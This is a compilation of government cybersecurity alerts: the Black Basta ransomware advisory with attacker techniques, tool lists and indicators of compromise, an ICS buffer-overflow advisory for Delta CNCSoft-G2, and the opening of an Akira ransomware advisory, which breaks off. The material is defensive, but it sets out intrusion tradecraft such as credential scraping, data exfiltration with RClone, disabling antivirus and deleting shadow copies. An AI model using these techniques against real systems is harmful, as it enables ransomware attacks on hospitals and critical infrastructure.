US-Cert Alerts

SUMMARY

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC) (hereafter referred to as the authoring organizations) are releasing this joint CSA to provide information on Black Basta, a ransomware variant whose actors have encrypted and stolen data from at least 12 out of 16 critical infrastructure sectors, including the Healthcare and Public Health (HPH) Sector.

This joint CSA provides TTPs and IOCs obtained from FBI investigations and third-party reporting. Black Basta is considered a ransomware-as-a-service (RaaS) variant and was first identified in April 2022. Black Basta affiliates have impacted a wide range of businesses and critical infrastructure in North America, Europe, and Australia. As of May 2024, Black Basta affiliates have impacted over 500 organizations globally.

Black Basta affiliates use common initial access techniques—such as phishing and exploiting known vulnerabilities—and then employ a double-extortion model, both encrypting systems and exfiltrating data. Ransom notes do not generally include an initial ransom demand or payment instructions. Instead, the notes provide victims with a unique code and instructs them to contact the ransomware group via a .onion URL (reachable through the Tor browser). Typically, the ransom notes give victims between 10 and 12 days to pay the ransom before the ransomware group publishes their data on the Black Basta TOR site, Basta News.

Healthcare organizations are attractive targets for cybercrime actors due to their size, technological dependence, access to personal health information, and unique impacts from patient care disruptions. The authoring organizations urge HPH Sector and all critical infrastructure organizations to apply the recommendations in the Mitigations section of this CSA to reduce the likelihood of compromise from Black Basta and other ransomware attacks. Victims of ransomware should report the incident to their local FBI field office or CISA (see the Reporting section for contact information).

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 15. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Initial Access

Black Basta affiliates primarily use spearphishing [T1566] to obtain initial access. According to cybersecurity researchers, affiliates have also used Qakbot during initial access.[1]

Starting in February 2024, Black Basta affiliates began exploiting ConnectWise vulnerability CVE-2024-1709 [CWE-288] [T1190]. In some instances, affiliates have been observed abusing valid credentials [T1078].

Discovery and Execution

Black Basta affiliates use tools such as SoftPerfect network scanner (netscan.exe) to conduct network scanning. Cybersecurity researchers have observed affiliates conducting reconnaissance using utilities with innocuous file names such as Intel or Dell, left in the root drive C:\ [T1036].[1]

Lateral Movement

Black Basta affiliates use tools such as BITSAdmin and PsExec, along with Remote Desktop Protocol (RDP), for lateral movement. Some affiliates also use tools like Splashtop, Screen Connect, and Cobalt Strike beacons to assist with remote access and lateral movement.

Privilege Escalation and Lateral Movement

Black Basta affiliates use credential scraping tools like Mimikatz for privilege escalation. According to cybersecurity researchers, Black Basta affiliates have also exploited ZeroLogon (CVE-2020-1472, [CWE-330]), NoPac (CVE-2021-42278 [CWE-20] and CVE-2021-42287 [CWE-269]), and PrintNightmare (CVE-2021-34527, [CWE-269]) vulnerabilities for local and Windows Active Domain privilege escalation [T1068].[1],[2]

Exfiltration and Encryption

Black Basta affiliates use RClone to facilitate data exfiltration prior to encryption. Prior to exfiltration, cybersecurity researchers have observed Black Basta affiliates using PowerShell [T1059.001] to disable antivirus products, and in some instances, deploying a tool called Backstab, designed to disable endpoint detection and response (EDR) tooling [T1562.001].[3] Once antivirus programs are terminated, a ChaCha20 algorithm with an RSA-4096 public key fully encrypts files [T1486]. A .basta or otherwise random file extension is added to file names and a ransom note titled readme.txt is left on the compromised system.[4] To further inhibit system recovery, affiliates use the vssadmin.exe program to delete volume shadow copies [T1490].[5]

Leveraged Tools

See Table 1 for publicly available tools and applications used by Black Basta affiliates. This includes legitimate tools repurposed for their operations.

Disclaimer: Use of these tools and applications should not be attributed as malicious without analytical evidence to support threat actor use and/or control.

Table 1: Tools Used by Black Basta Affiliates Tool Name Description BITSAdmin A command-line utility that manages downloads/uploads between a client and server by using the Background Intelligent Transfer Service (BITS) to perform asynchronous file transfers. Cobalt Strike A penetration testing tool used by security professions to test the security of networks and systems. Black Basta affiliates have used it to assist with lateral movement and file execution. Mimikatz A tool that allows users to view and save authentication credentials such as Kerberos tickets. Black Basta affiliates have used it to aid in privilege escalation. PSExec A tool designed to run programs and execute commands on remote systems. PowerShell A cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS. RClone A command line program used to sync files with cloud storage services such as Mega. SoftPerfect A network scanner (netscan.exe) used to ping computers, scan ports, discover shared folders, and retrieve information about network devices via Windows Management Instrumentation (WMI), Simple Network Management Protocol (SNMP), HTTP, Secure Shell (SSH) and PowerShell. It also scans for remote services, registry, files, and performance counters.  ScreenConnect Remote support, access, and meeting software that allows users to control devices remotely over the internet. Splashtop Remote desktop software that allows remote access to devices for support, access, and collaboration. WinSCP Windows Secure Copy is a free and open source SSH File Transfer Protocol, File Transfer Protocol, WebDAV, Amazon S3, and secure copy protocol client. Black Basta affiliates have used it to transfer data from a compromised network to actor-controlled accounts. MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 2–6 for all referenced threat actor tactics and techniques in this advisory.

Table 2: Black Basta ATT&CK Techniques for Initial Access Technique Title ID Use Phishing T1566 Black Basta affiliates have used spearphishing emails to obtain initial access. Exploit Public-Facing Application T1190 Black Basta affiliates have exploited ConnectWise vulnerability CVE-2024-1709 to obtain initial access. Table 3: Black Basta ATT&CK Techniques for Privilege Escalation Technique Title ID Use Exploitation for Privilege Escalation T1068 Black Basta affiliates have used credential scraping tools like Mimikatz, Zerologon, NoPac and PrintNightmare for privilege escalation. Table 4: Black Basta ATT&CK Techniques for Defense Evasion Technique Title ID Use Masquerading T1036 Black Basta affiliates have conducted reconnaissance using utilities with innocuous file names, such as Intel or Dell, to evade detection. Impair Defenses: Disable or Modify Tools T1562.001

Black Basta affiliates have deployed a tool called Backstab to disable endpoint detection and response (EDR) tooling.

Black Basta affiliates have used PowerShell to disable antivirus products.

Table 5: Black Basta ATT&CK Techniques for Execution Technique Title ID Use Command and Scripting Interpreter: PowerShell T1059.001 Black Basta affiliates have used PowerShell to disable antivirus products. Table 6: Black Basta ATT&CK Techniques for Impact Technique Title ID Use Inhibit System Recovery T1490 Black Basta affiliates have used the vssadmin.exe program to delete shadow copies.  Data Encrypted for Impact T1486 Black Basta affiliates have used a public key to fully encrypt files. 

 

INDICATORS OF COMPROMISE

See Table 7 for IOCs obtained from FBI investigations.

Table 7: Malicious Files Associated with Black Basta Ransomware Hash Description 0112e3b20872760dda5f658f6b546c85f126e803e27f0577b294f335ffa5a298 rclone.exe d3683beca3a40574e5fd68d30451137e4a8bbaca8c428ebb781d565d6a70385e Winscp.exe 88c8b472108e0d79d16a1634499c1b45048a10a38ee799054414613cc9dccccc DLL 58ddbea084ce18cfb3439219ebcf2fc5c1605d2f6271610b1c7af77b8d0484bd DLL 39939eacfbc20a2607064994497e3e886c90cd97b25926478434f46c95bd8ead DLL 5b2178c7a0fd69ab00cef041f446e04098bbb397946eda3f6755f9d94d53c221 DLL 51eb749d6cbd08baf9d43c2f83abd9d4d86eb5206f62ba43b768251a98ce9d3e DLL d15bfbc181aac8ce9faa05c2063ef4695c09b718596f43edc81ca02ef03110d1 DLL 5942143614d8ed34567ea472c2b819777edd25c00b3e1b13b1ae98d7f9e28d43 DLL 05ebae760340fe44362ab7c8f70b2d89d6c9ba9b9ee8a9f747b2f19d326c3431 DLL a7b36482ba5bca7a143a795074c432ed627d6afa5bc64de97fa660faa852f1a6 DLL 86a4dd6be867846b251460d2a0874e6413589878d27f2c4482b54cec134cc737 DLL 07117c02a09410f47a326b52c7f17407e63ba5e6ff97277446efc75b862d2799 DLL 96339a7e87ffce6ced247feb9b4cb7c05b83ca315976a9522155bad726b8e5be ELF 1c1b2d7f790750d60a14bd661dae5c5565f00c6ca7d03d062adcecda807e1779 ELF 360c9c8f0a62010d455f35588ef27817ad35c715a5f291e43449ce6cb1986b98 ELF 0554eb2ffa3582b000d558b6950ec60e876f1259c41acff2eac47ab78a53e94a EXE 9a55f55886285eef7ffabdd55c0232d1458175b1d868c03d3e304ce7d98980bc EXE 62e63388953bb30669b403867a3ac2c8130332cf78133f7fd4a7f23cdc939087 EXE 7ad4324ea241782ea859af12094f89f9a182236542627e95b6416c8fb9757c59 EXE 350ba7fca67721c74385faff083914ecdd66ef107a765dfb7ac08b38d5c9c0bd EXE 90ba27750a04d1308115fa6a90f36503398a8f528c974c5adc07ae8a6cd630e7 EXE fafaff3d665b26b5c057e64b4238980589deb0dff0501497ac50be1bc91b3e08 EXE acb60f0dd19a9a26aaaefd3326db8c28f546b6b0182ed2dcc23170bcb0af6d8f EXE d73f6e240766ddd6c3c16eff8db50794ab8ab95c6a616d4ab2bc96780f13464d EXE f039eaaced72618eaba699d2985f9e10d252ac5fe85d609c217b45bc8c3614f4 EXE 723d1cf3d74fb3ce95a77ed9dff257a78c8af8e67a82963230dd073781074224 EXE ae7c868713e1d02b4db60128c651eb1e3f6a33c02544cc4cb57c3aa6c6581b6e EXE fff35c2da67eef6f1a10c585b427ac32e7f06f4e4460542207abcd62264e435f EXE df5b004be71717362e6b1ad22072f9ee4113b95b5d78c496a90857977a9fb415 EXE 462bbb8fd7be98129aa73efa91e2d88fa9cafc7b47431b8227d1957f5d0c8ba7 EXE 3c50f6369f0938f42d47db29a1f398e754acb2a8d96fd4b366246ac2ccbe250a EXE 5d2204f3a20e163120f52a2e3595db19890050b2faa96c6cba6b094b0a52b0aa EXE 37a5cd265f7f555f2fe320a68d70553b7aa9601981212921d1ac2c114e662004 EXE 3090a37e591554d7406107df87b3dc21bda059df0bc66244e8abef6a5678af35 EXE 17879ed48c2a2e324d4f5175112f51b75f4a8ab100b8833c82e6ddb7cd817f20 EXE 42f05f5d4a2617b7ae0bc601dd6c053bf974f9a337a8fcc51f9338b108811b78 EXE 882019d1024778e13841db975d5e60aaae1482fcf86ba669e819a68ce980d7d3 EXE e28188e516db1bda9015c30de59a2e91996b67c2e2b44989a6b0f562577fd757 EXE 0a8297b274aeab986d6336b395b39b3af1bb00464cf5735d1ecdb506fef9098e EXE 69192821f8ce4561cf9c9cb494a133584179116cb2e7409bea3e18901a1ca944 EXE 3337a7a9ccdd06acdd6e3cf4af40d871172d0a0e96fc48787b574ac93689622a EXE 17205c43189c22dfcb278f5cc45c2562f622b0b6280dcd43cc1d3c274095eb90 EXE b32daf27aa392d26bdf5faafbaae6b21cd6c918d461ff59f548a73d447a96dd9 EXE

See Tables 8–11 for IOCs obtained from trusted third-party reporting.

Disclaimer: The authoring organizations recommend network defenders investigate or vet IP addresses prior to taking action, such as blocking, as many cyber actors are known to change IP addresses, sometimes daily, and some IP addresses may host valid domains.

Table 8: Network Indicators IP Address Description 66.249.66[.]18 0gpw.588027fa.dns.realbumblebee[.]net, dns.trailshop[.]net, dns.artspathgroupe[.]net 66.249.66[.]18 my.2a91c002002.588027fa.dns.realbumblebee[.]net 66.249.66[.]18 fy9.39d9030e5d3a8e2352daae2f4cd3c417b36f64c6644a783b9629147a1.afd8b8a4615358e0313bad8c544a1af0d8efcec0e8056c2c8eee96c7.b06d1825c0247387e38851b06be0272b0bd619b7c9636bc17b09aa70.a46890f27.588027fa.dns.realbumblebee[.]net 95.181.173[.]227 adslsdfdsfmo[.]world   fy9.36c44903529fa273afff3c9b7ef323432e223d22ae1d625c4a3957d57.015c16eff32356bf566c4fd3590c6ff9b2f6e8c587444ecbfc4bcae7.f71995aff9e6f22f8daffe9d2ad9050abc928b8f93bb0d42682fd3c3.445de2118.588027fa.dns.realbumblebee[.]net 207.126.152[.]242 xkpal.d6597fa.dns.blocktoday.net
nuher.3577125d2a75f6a277fc5714ff536c5c6af5283d928a66daad6825b9a.7aaf8bba88534e88ec89251c57b01b322c7f52c7f1a5338930ae2a50.cbb47411f60fe58f76cf79d300c03bdecfb9e83379f59d80b8494951.e10c20f77.7fcc0eb6.dns.blocktoday[.]net 72.14.196[.]50 .rasapool[.]net, dns.trailshop[.]net 72.14.196[.]192 .rasapool[.]net 72.14.196[.]2 .rasapool[.]net 72.14.196[.]226 .rasapool[.]net 46.161.27[.]151   207.126.152[.]242 nuher.1d67bbcf4.456d87aa6.2d84dfba.dns.specialdrills[.]com 185.219.221[.]136   64.176.219[.]106   5.78.115[.]67 your-server[.]de 207.126.152[.]242 xkpal.1a4a64b6.dns.blocktoday[.]net 46.8.16[.]77   185.7.214[.]79 VPN Server 185.220.100[.]240 Tor exit 107.189.30[.]69 Tor exit 5.183.130[.]92   185.220.101[.]149 Tor exit 188.130.218[.]39   188.130.137[.]181   46.8.10[.]134   155.138.246[.]122   80.239.207[.]200 winklen[.]ch 183.181.86[.]147 Xserver[.]jp 34.149.120[.]3   104.21.40[.]72   34.250.161[.]149   88.198.198[.]90 your-server[.]de; literoved[.]ru 151.101.130[.]159   35.244.153[.]44   35.212.86[.]55   34.251.163[.]236   34.160.81[.]203   34.149.36[.]179   104.21.26[.]145   83.243.40[.]10   35.227.194[.]51   35.190.31[.]54   34.120.190[.]48   116.203.186[.]178   34.160.17[.]71   Table 9: File Indicators Filename Hash C:\Users\Public\Audio\Jun.exe b6a4f4097367d9c124f51154d8750ea036a812d5badde0baf9c5f183bb53dd24 C:\Users\Public\Audio\esx.zip   C:\Users\Public\Audio\7zG.exe f21240e0bf9f0a391d514e34d4fa24ecb997d939379d2260ebce7c693e55f061 C:\Users\Public\Audio\7z.dll   C:\Users\Public\db_Usr.sql 8501e14ee6ee142122746333b936c9ab0fc541328f37b5612b6804e6cdc2c2c6 C:\Users\Public\Audio\db_Usr.sql   C:\Users\Public\Audio\hv2.ps1   C:\Users\Public\7zG.exe   C:\Users\Public\7z.dll   C:\Users\Public\BitLogic.dll   C:\Users\Public\NetApp.exe 4c897334e6391e7a2fa3cbcbf773d5a4 C:\Users\Public\DataSoft.exe 2642ec377c0cee3235571832cb472870 C:\Users\Public\BitData.exe b3fe23dd4701ed00d79c03043b0b952e C:\Users\Public\DigitalText.dll   C:\Users\Public\GeniusMesh.exe   \Device\Mup\{redacted}\C$\Users\Public\Music\PROCEXP.sys   \Device\Mup\{redacted}\C$\Users\Public\Music\DumpNParse86.exe   \Device\Mup\{redacted}\C$\Users\Public\Music\POSTDump.exe   \Device\Mup\{redacted}\C$\Users\Public\Music\DumpNParse.exe   C:\Users\Public\socksps.ps1   C:\Users\Public\Thief.exe 034b5fe047920b2ae9493451623633b14a85176f5eea0c7aadc110ea1730ee79

C:\Users\All Users\{redacted}\GWT.ps1

C:\Program Files\MonitorIT\GWT.ps1

8C68B2A794BA3D148CAE91BDF9C8D357289752A94118B5558418A36D95A5A45F

Winx86.exe 

Comment: alias for cmd.exe

  C:\Users\Public\eucr.exe 3c65da7f7bfdaf9acc6445abbedd9c4e927d37bb9e3629f34afc338058680407 C:\Windows\DS_c1.dll 808c96cb90b7de7792a827c6946ff48123802959635a23bf9d98478ae6a259f9 C:\Windows\DS_c1.dll 3a8fc07cadc08eeb8be342452636a754158403c3d4ebff379a4ae66f8298d9a6 C:\Windows\DS_c1.dll 4ac69411ed124da06ad66ee8bfbcea2f593b5b199a2c38496e1ee24f9d04f34a C:\Windows\DS_c1.dll 819cb9bcf62be7666db5666a693524070b0df589c58309b067191b30480b0c3a C:\Windows\DS_c1.dll c26a5cb62a78c467cc6b6867c7093fbb7b1a96d92121d4d6c3f0557ef9c881e0 C:\Windows\DS_c1.dll d503090431fdd99c9df3451d9b73c5737c79eda6eb80c148b8dc71e84623401f *\instructions_read_me.txt   Table 10: Known Black Basta Cobalt Strike Domains Domain Date/Time (UTC)/Time (UTC) trailshop[.]net 5/8/2024 6:37 realbumblebee[.]net 5/8/2024 6:37 recentbee[.]net 5/8/2024 6:37 investrealtydom[.]net 5/8/2024 6:37 webnubee[.]com 5/8/2024 6:37 artspathgroup[.]net 5/8/2024 6:37 buyblocknow[.]com 5/8/2024 6:37 currentbee[.]net 5/8/2024 6:37 modernbeem[.]net 5/8/2024 6:37 startupbusiness24[.]net 5/8/2024 6:37 magentoengineers[.]com 5/8/2024 6:37 childrensdolls[.]com 5/8/2024 6:37 myfinancialexperts[.]com 5/8/2024 6:37 limitedtoday[.]com 5/8/2024 6:37 kekeoamigo[.]com 5/8/2024 6:37 nebraska-lawyers[.]com 5/8/2024 6:37 tomlawcenter[.]com 5/8/2024 6:37 thesmartcloudusa[.]com 5/8/2024 6:37 rasapool[.]net 5/8/2024 6:37 artspathgroupe[.]net 5/8/2024 6:37 specialdrills[.]com 5/8/2024 6:37 thetrailbig[.]net 5/8/2024 6:37 consulheartinc[.]com 3/22/2024 15:35 otxcosmeticscare[.]com 3/15/2024 10:14 otxcarecosmetics[.]com 3/15/2024 10:14 artstrailman[.]com 3/15/2024 10:14 ontexcare[.]com 3/15/2024 10:14 trackgroup[.]net 3/15/2024 10:14 businessprofessionalllc[.]com 3/15/2024 10:14 securecloudmanage[.]com 3/7/2024 10:42 oneblackwood[.]com 3/7/2024 10:42 buygreenstudio[.]com 3/7/2024 10:42 startupbuss[.]com 3/7/2024 10:42 onedogsclub[.]com 3/4/2024 18:26 wipresolutions[.]com 3/4/2024 18:26 recentbeelive[.]com 3/4/2024 18:26 trailcocompany[.]com 3/4/2024 18:26 trailcosolutions[.]com 3/4/2024 18:26 artstrailreviews[.]com 3/4/2024 18:26 usaglobalnews[.]com 2/15/2024 5:56 topglobaltv[.]com 2/15/2024 5:56 startupmartec[.]net 2/15/2024 5:56 technologgies[.]com 1/2/2024 18:16 jenshol[.]com 1/2/2024 18:16 simorten[.]com 1/2/2024 18:16 investmentgblog[.]net 1/2/2024 18:16 protectionek[.]com 1/2/2024 18:16 Table 11: Suspected Black Basta Domains airbusco[.]net allcompanycenter[.]com animalsfast[.]net audsystemecll[.]net auuditoe[.]com bluenetworking[.]net brendonline[.]com businesforhome[.]com caspercan[.]com clearsystemwo[.]net cloudworldst[.]net constrtionfirst[.]com erihudeg[.]com garbagemoval[.]com gartenlofti[.]com getfnewsolutions[.]com getfnewssolutions[.]com investmendvisor[.]net investmentrealtyhp[.]net ionoslaba[.]com jessvisser[.]com karmafisker[.]com kolinileas[.]com maluisepaul[.]com masterunix[.]net monitor-websystem[.]net monitorsystem[.]net mytrailinvest[.]net prettyanimals[.]net reelsysmoona[.]net seohomee[.]com septcntr[.]com softradar[.]net startupbizaud[.]net startuptechnologyw[.]net steamteamdev[.]net stockinvestlab[.]net taskthebox[.]net trailgroupl[.]net treeauwin[.]net unitedfrom[.]com unougn[.]com wardeli[.]com welausystem[.]net wellsystemte[.]net withclier[.]com MITIGATIONS

The authoring organizations recommend all critical infrastructure organizations implement the mitigations below to improve your organization’s cybersecurity posture based on Black Basta’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

• Install updates for operating systems, software, and firmware as soon as they are released [CPG 1.E]. Prioritize updating Known Exploited Vulnerabilities (KEV).
• Require phishing-resistant multi-factor authentication (MFA) [CPG 2.H] for as many services as possible.
• Implement recommendations, including training users to recognize and report phishing attempts [CPG 2.I], from joint Phishing Guidance: Stopping the Attack Cycle at Phase One.
• Secure remote access software by applying mitigations from joint Guide to Securing Remote Access Software.
• Make backups of critical systems and device configurations [CPG 2.R] to enable devices to be repaired and restored.
• Apply mitigations from the joint #StopRansomware Guide.

The authoring organizations also recommend network defenders of HPH Sector and other critical infrastructure organizations to reference CISA’s Mitigation Guide: Healthcare and Public Health (HPH) Sector and HHS’s HPH Cybersecurity Performance Goals, which provide best practices to combat pervasive cyber threats against organizations. Recommendations include the following:

• Asset Management and Security: Cybersecurity professionals should identify and understand all relationships or interdependencies, functionality of each asset, what it exposes, and what software is running to ensure critical data and systems are protected appropriately. HPH Sector organizations should ensure electronic PHI (ePHI) is protected and compliant with the Health Insurance Portability and Accountability Act (HIPAA). Organizations can complete asset inventories using active scans, passive processes, or a combination of both techniques.
• Email Security and Phishing Prevention: Organizations should install modern anti-malware software and automatically update signatures where possible. For additional guidance, see CISA’s Enhance Email and Web Security Guide.
  • Check for embedded or spoofed hyperlinks: Validate the URL of the link matches the text of the link itself. This can be achieved by hovering your cursor over the link to view the URL of the website to be accessed.
• Access Management: Phishing-resistant MFA completes the same process but removes ‘people’ from the equation to help thwart social engineering scams and targeted phishing attacks that may have been successful using traditional MFA. The two main forms of phishing-resistant MFA are FIDO/Web Authentication (WebAuthn) authentication and Public Key Infrastructure (PKI)-based authentication. Prioritize phishing-resistant MFA on accounts with the highest risk, such as privileged administrative accounts on key assets. For additional information on phishing-resistant MFA, see CISA’s Implementing Phishing-Resistant MFA Guide.
• Vulnerability Management and Assessment: Once vulnerabilities are identified across your environment, evaluate and prioritize to appropriately deal with the posed risks according to your organization’s risk strategy. To assist with prioritization, it is essential to:
  • Map your assets to business-critical functions. For vulnerability remediation, prioritize assets that are most critical for ongoing operations or which, if affected, could impact your organization’s business continuity, sensitive PII (or PHI) security, reputation, or financial position.
  • Use threat intelligence information. For remediation, prioritize vulnerabilities actively exploited by threat actors. To assist, leverage CISA’s KEV Catalog and other threat intelligence feeds.
  • Leverage prioritization methodologies, ratings, and scores. The Common Vulnerability Scoring System (CVSS) assesses the technical severity of vulnerabilities. The Exploit Prediction Scoring System (EPSS) measures the likelihood of exploitation and can help with deciding which vulnerabilities to prioritize. CISA’s Stakeholder-Specific Vulnerability Categorization (SSVC) methodology leverages decision trees to prioritize relevant vulnerabilities into four decisions, Track, Track*, Attend, and Act based on exploitation status, technical impact, mission prevalence, and impacts to safety and public-wellbeing.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, the authoring organizations recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring organizations recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

1. Select an ATT&CK technique described in this advisory (see Tables 2-6).
2. Align your security technologies against the technique.
3. Test your technologies against the technique.
4. Analyze your detection and prevention technologies’ performance.
5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

The authoring organizations recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

REFERENCES

1. SentinelOne: Black Basta Ransomware | Attacks Deploy Custom EDR Evasion Tools Tied to FIN7 Threat Actor
2. Trend Micro: Ransomware Spotlight - Black Basta
3. Kroll: Black Basta - Technical Analysis
4. Who Is Black Basta? (blackberry.com)
5. Palo Alto Networks: Threat Assessment - Black Basta Ransomware

REPORTING

Your organization has no obligation to respond or provide information back to FBI in response to this joint CSA. If, after reviewing the information provided, your organization decides to provide information to FBI, reporting must be consistent with applicable state and federal laws.

FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.

Additional details of interest include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.

FBI, CISA, and HHS do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to FBI’s Internet Crime Complain Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov or by calling 1-844-Say-CISA [1-844-729-2472]).

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. FBI, CISA, HHS, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, HHS, and MS-ISAC.

VERSION HISTORY

May 10, 2024: Initial version.

View CSAF

1. EXECUTIVE SUMMARY

• CVSS v4 8.5
• ATTENTION: Low attack complexity
• Vendor: Delta Electronics
• Equipment: CNCSoft-G2 DOPSoft
• Vulnerability: Stack-based Buffer Overflow

2. RISK EVALUATION

Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code.

3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS

The following versions of Delta Electronics CNCSoft-G2, a Human-Machine Interface (HMI) software, are affected:

• CNCSoft-G2: Versions 2.0.0.5 (with DOPSoft v5.0.0.93) and prior

3.2 Vulnerability Overview 3.2.1 STACK-BASED BUFFER OVERFLOW CWE-121

Delta Electronics CNCSoft-G2 lacks proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process.

CVE-2024-4192 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.8 has been calculated; the CVSS vector string is (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H ).

A CVSS v4 score has also been calculated for CVE-2024-4192. A base score of 8.5 has been calculated; the CVSS vector string is (CVSS4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).

3.3 BACKGROUND

• CRITICAL INFRASTRUCTURE SECTORS: Energy, Critical Manufacturing
• COUNTRIES/AREAS DEPLOYED: Worldwide
• COMPANY HEADQUARTERS LOCATION: Taiwan

3.4 RESEARCHER

Natnael Samson working with Trend Micro Zero Day Initiative reported this vulnerability to CISA.

4. MITIGATIONS

Delta Electronics recommends users update to CNCSoft-G2 v2.1.0.4 or later.

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as:

• Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
• Locate control system networks and remote devices behind firewalls and isolating them from business networks.
• When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:

• Do not click web links or open attachments in unsolicited email messages.
• Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
• Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely.

5. UPDATE HISTORY

• April 30, 2024: Initial Publication

SUMMARY

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The United States’ Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Europol’s European Cybercrime Centre (EC3), and the Netherlands’ National Cyber Security Centre (NCSC-NL) are releasing this joint CSA to disseminate known Akira ransomware IOCs and TTPs identified through FBI investigations and trusted third party reporting as recently as February 2024.

Since March 2023, Akira ransomware has impacted a wide range of businesses and critical infrastructure entities in North America, Europe, and Australia. In April 2023, following an initial focus on Windows systems, Akira threat actors deployed a Linux variant targeting VMware ESXi virtual machines. As of January 1, 2024, the ransomware group has impacted over 250 organizations and claimed approximately $42 million (USD) in ransomware proceeds.

Early versions of the Akira ransomware variant were written in C++ and encrypted files with a .akira extension; however, beginning in August 2023, some Akira attacks began deploying Megazord, using Rust-based code which encrypts files with a .powerranges extension.  Akira threat actors have continued to use both Megazord and Akira, including Akira_v2 (identified by trusted third party investigations) interchangeably.

The FBI, CISA, EC3, and NCSC-NL encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.

Download the PDF version of this report:

#StopRansomware: Akira Ransomware (PDF, 586.86 KB ) TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.

Initial Access

The FBI and cybersecurity researchers have observed Akira threat actors obtaining initial access to organizations through a virtual private network (VPN) service without multifactor authentication (MFA) configured[1], mostly using known Cisco vulnerabilities [T1190] CVE-2020-3259 and CVE-2023-20269.[2],[3],[4] Additional methods of initial access include the use of external-facing services such as Remote Desktop Protocol (RDP) [T1133], spear phishing [T1566.001][T1566.002], and the abuse of valid credentials[T1078].[4]

Persistence and Discovery

Once initial access is obtained, Akira threat actors attempt to abuse the functions of domain controllers by creating new domain accounts [T1136.002] to establish persistence. In some instances, the FBI identified Akira threat actors creating an administrative account named itadm.

